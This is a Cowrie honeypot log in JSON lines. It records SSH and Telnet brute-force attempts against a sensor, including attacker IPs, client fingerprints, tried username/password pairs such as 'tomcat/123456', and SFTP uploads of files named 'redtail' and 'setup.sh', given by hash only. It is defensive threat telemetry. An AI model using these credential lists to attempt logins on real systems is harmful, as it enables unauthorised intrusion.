{"eventid":"cowrie.session.file_upload","filename":"redtail.i686","outfile":"var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","shasum":"ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","message":"SFTP Uploaded file \"redtail.i686\" to var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","sensor":"my-vps","timestamp":"2025-08-28T02:37:42.042110Z","src_ip":"212.227.125.160","session":"81a730cb381f"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.x86_64","outfile":"var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","shasum":"d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","message":"SFTP Uploaded file \"redtail.x86_64\" to var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","sensor":"my-vps","timestamp":"2025-08-28T02:37:42.044849Z","src_ip":"212.227.125.160","session":"81a730cb381f"}
{"eventid":"cowrie.session.file_upload","filename":"setup.sh","outfile":"var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","shasum":"783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","message":"SFTP Uploaded file \"setup.sh\" to var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","sensor":"my-vps","timestamp":"2025-08-28T02:37:42.046040Z","src_ip":"212.227.125.160","session":"81a730cb381f"}
{"eventid":"cowrie.session.closed","duration":"11.2","message":"Connection lost after 11.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:37:42.094836Z","src_ip":"212.227.125.160","session":"81a730cb381f"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":43532,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d1e369beab1","protocol":"ssh","message":"New connection: 194.233.79.134:43532 (1.2.3.4:22) [session: 3d1e369beab1]","sensor":"my-vps","timestamp":"2025-08-28T02:38:17.793093Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:38:17.921959Z","src_ip":"194.233.79.134","session":"3d1e369beab1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:38:18.282176Z","src_ip":"194.233.79.134","session":"3d1e369beab1"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest123","message":"login attempt [guest/guest123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:38:20.909508Z","src_ip":"194.233.79.134","session":"3d1e369beab1"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:38:22.353596Z","src_ip":"194.233.79.134","session":"3d1e369beab1"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":48616,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dab291d5c0c","protocol":"ssh","message":"New connection: 194.233.79.134:48616 (1.2.3.4:22) [session: 2dab291d5c0c]","sensor":"my-vps","timestamp":"2025-08-28T02:39:57.264384Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:39:58.062396Z","src_ip":"194.233.79.134","session":"2dab291d5c0c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:39:58.063202Z","src_ip":"194.233.79.134","session":"2dab291d5c0c"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456","message":"login attempt [tomcat/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T02:39:59.448915Z","src_ip":"194.233.79.134","session":"2dab291d5c0c"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:40:00.624624Z","src_ip":"194.233.79.134","session":"2dab291d5c0c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54752,"dst_ip":"1.2.3.4","dst_port":23,"session":"939937f8cf64","protocol":"telnet","message":"New connection: 212.227.125.160:54752 (1.2.3.4:23) [session: 939937f8cf64]","sensor":"my-vps","timestamp":"2025-08-28T02:40:09.594802Z"}
{"eventid":"cowrie.session.closed","duration":12.990517139434814,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:40:22.585244Z","src_ip":"212.227.125.160","session":"939937f8cf64"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59504,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c9e97d24314","protocol":"ssh","message":"New connection: 217.72.205.35:59504 (1.2.3.4:22) [session: 2c9e97d24314]","sensor":"my-vps","timestamp":"2025-08-28T02:40:31.056231Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:40:31.057438Z","src_ip":"217.72.205.35","session":"2c9e97d24314"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50354,"dst_ip":"1.2.3.4","dst_port":22,"session":"16d53ccbb877","protocol":"ssh","message":"New connection: 212.227.235.229:50354 (1.2.3.4:22) [session: 16d53ccbb877]","sensor":"my-vps","timestamp":"2025-08-28T02:40:46.126324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:40:46.127433Z","src_ip":"212.227.235.229","session":"16d53ccbb877"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T02:40:46.235710Z","src_ip":"212.227.235.229","session":"16d53ccbb877"}
{"eventid":"cowrie.login.failed","username":"bin","password":"123456","message":"login attempt [bin/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T02:40:46.552570Z","src_ip":"212.227.235.229","session":"16d53ccbb877"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:40:47.660343Z","src_ip":"212.227.235.229","session":"16d53ccbb877"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":60926,"dst_ip":"1.2.3.4","dst_port":22,"session":"963868eb8790","protocol":"ssh","message":"New connection: 194.233.79.134:60926 (1.2.3.4:22) [session: 963868eb8790]","sensor":"my-vps","timestamp":"2025-08-28T02:41:24.971910Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:41:24.972835Z","src_ip":"194.233.79.134","session":"963868eb8790"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:41:25.342697Z","src_ip":"194.233.79.134","session":"963868eb8790"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"123456","message":"login attempt [elsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T02:41:26.058443Z","src_ip":"194.233.79.134","session":"963868eb8790"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:41:27.275968Z","src_ip":"194.233.79.134","session":"963868eb8790"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.240.46","src_port":34968,"dst_ip":"1.2.3.4","dst_port":22,"session":"054b22b78f70","protocol":"ssh","message":"New connection: 77.83.240.46:34968 (1.2.3.4:22) [session: 054b22b78f70]","sensor":"my-vps","timestamp":"2025-08-28T02:42:11.218409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:42:11.219350Z","src_ip":"77.83.240.46","session":"054b22b78f70"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T02:42:11.232527Z","src_ip":"77.83.240.46","session":"054b22b78f70"}
{"eventid":"cowrie.login.failed","username":"sol","password":"sol","message":"login attempt [sol/sol] failed","sensor":"my-vps","timestamp":"2025-08-28T02:42:11.276670Z","src_ip":"77.83.240.46","session":"054b22b78f70"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:42:13.102864Z","src_ip":"77.83.240.46","session":"054b22b78f70"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":43648,"dst_ip":"1.2.3.4","dst_port":22,"session":"355469223f85","protocol":"ssh","message":"New connection: 194.233.79.134:43648 (1.2.3.4:22) [session: 355469223f85]","sensor":"my-vps","timestamp":"2025-08-28T02:42:47.333226Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:42:47.334163Z","src_ip":"194.233.79.134","session":"355469223f85"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:42:49.320036Z","src_ip":"194.233.79.134","session":"355469223f85"}
{"eventid":"cowrie.login.failed","username":"git","password":"123","message":"login attempt [git/123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:42:50.289032Z","src_ip":"194.233.79.134","session":"355469223f85"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:42:51.761842Z","src_ip":"194.233.79.134","session":"355469223f85"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":3362,"dst_ip":"1.2.3.4","dst_port":22,"session":"a89fdf2acb14","protocol":"ssh","message":"New connection: 212.227.125.160:3362 (1.2.3.4:22) [session: a89fdf2acb14]","sensor":"my-vps","timestamp":"2025-08-28T02:43:58.555669Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T02:43:58.556729Z","src_ip":"212.227.125.160","session":"a89fdf2acb14"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T02:43:58.636662Z","src_ip":"212.227.125.160","session":"a89fdf2acb14"}
{"eventid":"cowrie.login.failed","username":"service","password":"service","message":"login attempt [service/service] failed","sensor":"my-vps","timestamp":"2025-08-28T02:43:59.043073Z","src_ip":"212.227.125.160","session":"a89fdf2acb14"}
{"eventid":"cowrie.login.failed","username":"service","password":"abc123","message":"login attempt [service/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:44:00.125516Z","src_ip":"212.227.125.160","session":"a89fdf2acb14"}
{"eventid":"cowrie.login.failed","username":"service","password":"abcd123","message":"login attempt [service/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:44:01.208205Z","src_ip":"212.227.125.160","session":"a89fdf2acb14"}
{"eventid":"cowrie.login.failed","username":"service","password":"abcd1234","message":"login attempt [service/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T02:44:02.291185Z","src_ip":"212.227.125.160","session":"a89fdf2acb14"}
{"eventid":"cowrie.login.failed","username":"service","password":"abc1234","message":"login attempt [service/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T02:44:03.373285Z","src_ip":"212.227.125.160","session":"a89fdf2acb14"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:44:04.456581Z","src_ip":"212.227.125.160","session":"a89fdf2acb14"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":55204,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c2a6d8edacb","protocol":"ssh","message":"New connection: 194.233.79.134:55204 (1.2.3.4:22) [session: 4c2a6d8edacb]","sensor":"my-vps","timestamp":"2025-08-28T02:44:10.803109Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:44:11.131462Z","src_ip":"194.233.79.134","session":"4c2a6d8edacb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:44:11.132139Z","src_ip":"194.233.79.134","session":"4c2a6d8edacb"}
{"eventid":"cowrie.login.failed","username":"vagrant","password":"vagrant","message":"login attempt [vagrant/vagrant] failed","sensor":"my-vps","timestamp":"2025-08-28T02:44:13.292998Z","src_ip":"194.233.79.134","session":"4c2a6d8edacb"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:44:14.637492Z","src_ip":"194.233.79.134","session":"4c2a6d8edacb"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":45230,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d75c13a3af5","protocol":"ssh","message":"New connection: 194.233.79.134:45230 (1.2.3.4:22) [session: 6d75c13a3af5]","sensor":"my-vps","timestamp":"2025-08-28T02:45:39.716929Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:45:40.214314Z","src_ip":"194.233.79.134","session":"6d75c13a3af5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:45:40.309341Z","src_ip":"194.233.79.134","session":"6d75c13a3af5"}
